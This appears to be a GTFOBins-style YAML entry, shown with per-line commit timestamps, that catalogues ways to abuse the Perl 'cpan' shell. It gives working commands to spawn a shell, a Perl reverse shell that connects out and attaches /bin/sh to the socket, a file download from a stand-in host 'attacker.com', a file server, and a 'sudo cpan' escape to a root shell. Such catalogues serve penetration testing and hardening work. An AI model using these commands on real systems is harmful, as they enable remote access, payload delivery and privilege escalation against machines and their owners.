2018-11-06 06:21:17 +01:00
---
functions:
shell:
2018-11-12 15:48:31 +01:00
- description: |
`cpan` lets you execute perl commands with the `! command` .
2018-11-06 06:21:17 +01:00
code: |
2018-11-06 08:43:35 +01:00
cpan
! exec '/bin/bash'
2018-11-06 06:21:17 +01:00
reverse-shell:
2018-11-08 21:15:22 +01:00
- description: Run `nc -lvp RPORT` on the attacker box to receive the shell.
2018-11-06 06:21:17 +01:00
code: |
2018-11-08 13:39:44 +01:00
export RHOST=localhost
export RPORT=9000
2018-11-06 08:43:35 +01:00
cpan
2018-11-08 13:39:44 +01:00
! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
2018-11-06 06:21:17 +01:00
file-upload:
2018-11-08 21:15:22 +01:00
- description: Serve files in the local folder running an HTTP server on port 8080. Install the dependency via `cpan HTTP::Server::Simple` .
2018-11-06 06:21:17 +01:00
code: |
2018-11-06 08:43:35 +01:00
cpan
! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
2018-11-06 06:21:17 +01:00
file-download:
2018-11-08 21:15:22 +01:00
- description: Fetch a remote file via an HTTP GET request and store it in `PWD` .
2018-11-06 06:21:17 +01:00
code: |
2018-11-08 21:01:40 +01:00
export URL=http://attacker.com/file_to_get
2018-11-06 08:43:35 +01:00
cpan
2018-11-08 16:35:39 +01:00
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
2018-11-06 06:21:17 +01:00
sudo:
- code: |
2018-11-06 08:43:35 +01:00
sudo cpan
! exec '/bin/bash'
2018-11-06 06:21:17 +01:00
---